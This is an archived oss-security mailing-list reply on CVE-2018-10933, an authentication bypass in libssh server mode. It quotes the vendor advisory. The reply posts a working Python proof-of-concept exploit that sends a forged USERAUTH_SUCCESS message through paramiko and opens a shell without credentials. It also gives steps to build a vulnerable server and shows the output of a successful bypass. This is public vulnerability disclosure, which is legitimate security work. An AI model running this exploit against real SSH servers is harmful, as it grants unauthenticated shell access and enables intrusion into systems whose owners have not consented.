'Re: [oss-security] CVE-2018-10933: libssh: authentication bypass in server code'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] CVE-2018-10933: libssh: authentication bypass in server code
From:       Minh Tuan Luong <not.soledad () gmail ! com>
Date:       2018-10-17 9:13:24
Message-ID: ec0cb776-0caf-c27e-dcff-ff68001900c2 () gmail ! com
[Download RAW message or body]

I have coded a simple POC for this CVE:

--- CVE-2018-10933.py ----

import paramiko
import socket
import sys

nbytes = 4096
hostname = "127.0.0.1"
port = 2222

sock = socket.socket()
try:
     sock.connect((hostname, port))
     # instantiate transport
     m = paramiko.message.Message()
     transport = paramiko.transport.Transport(sock)
     transport.start_client()

     m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
     transport._send_message(m)

     cmd_channel = transport.open_session()
     cmd_channel.invoke_shell()

except socket.error:
     print '[-] Connecting to host failed. Please check the specified 
host and port.'
     sys.exit(1)

-----

to test this code: get vulnerable version of libssh at homepage: 
https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz
after uncompress and build, go to example directory, there's a simple 
sshd server using libssh name: samplesshd-cb

run this simple sshd by command:
     $ samplesshd-cb 127.0.0.1 -p 2222
then run my code, output will be:
Allocated session channel
Allocated shell
mean that i can bypass authentication and spawn a shell without any 
credential

Regard, Soledad

On 10/16/2018 7:21 PM, Marcus Meissner wrote:
> Hi,
> 
> https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
> 
> -----
> libssh 0.8.4 and 0.7.6 security and bugfix release
> 
> This is an important security and maintenance release in order to address CVE-2018-10933.
> 
> libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. \
> By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the \
> SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, \
> the attacker could successfully authentciate without any credentials. 
> The bug was discovered by Peter Winter-Smith of NCC Group.
> -----
> 
> This only affects libssh operating in _server_ mode, but not the usual used client mode.
> 
> Ciao, Marcus


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic